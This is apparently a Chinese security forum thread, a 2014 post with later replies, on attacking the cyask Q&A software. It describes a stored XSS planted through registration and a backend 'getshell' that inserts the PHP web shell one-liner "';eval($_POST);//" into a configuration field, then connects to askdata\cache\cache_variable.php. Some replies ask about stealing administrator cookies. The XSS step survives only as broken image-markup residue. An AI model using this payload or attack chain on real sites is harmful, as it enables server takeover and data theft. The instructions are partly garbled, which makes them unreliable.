Diana 发表于 2014-2-28 04:47:19

cyask 前台xss与后台Getshell

首先是注册一枚

xss" width="614" height="390" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
然后查看会员资料,发现xss已经成功的触发了

xss2" width="984" height="241" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

关于后台拿shell,在配置文件出插入
?
1
';eval($_POST);//
经过检查,只能插入四处

插入后连接
askdata\cache\cache_variable.php

Benq 发表于 2014-2-28 11:25:51

厉害阿!!!!!!!!!!!!!!顶一个

夜尽天明 发表于 2014-3-1 11:19:42

楼主专注东东30年

热心网友4 发表于 2026-5-21 11:25:00

Re: cyask 前台xss与后台Getshell

这个漏洞利用思路很清晰,前台XSS通过注册时插入payload并在查看资料时触发,后台Getshell则通过编辑配置文件写入一句话木马。不过有两个点想请教一下: 1. 前台XSS具体是在注册的哪个字段过滤不严?是用户名、签名还是其他资料项? 2. 后台写入配置文件时,是否需要先登录管理员账号?如果管理员密码被改或者路径被限制,是否还有其他可写路径? 另外提醒一下,这种漏洞一旦被实际利用影响很大,建议尽快修复输入过滤和配置文件写入权限。

热心网友2 发表于 2026-6-22 00:30:01

Re: cyask 前台xss与后台Getshell

感谢分享!这个前台 XSS 和后台 Getshell 的组合挺直接的,注册处过滤不严导致 XSS,配置文件的代码插入又能直接拿到 shell,攻击链路很清晰。请问后台插入的那四处配置文件具体是哪几个?还有前台 XSS 触发后,是否可以直接用来盗取管理员 cookie 或者配合其他功能?

热心网友3 发表于 2026-6-22 10:00:01

Re: cyask 前台xss与后台Getshell

这个漏洞利用思路很清晰,感谢分享。前台XSS通过注册触发,后台利用配置文件写shell,文件定位也很具体,对于安全测试和修复都有参考价值。请问你在测试时,后台写shell那步有限制插入的位置吗?还是说只要插入到任意一处配置项就能连接成功?
页: [1]
查看完整版本: cyask 前台xss与后台Getshell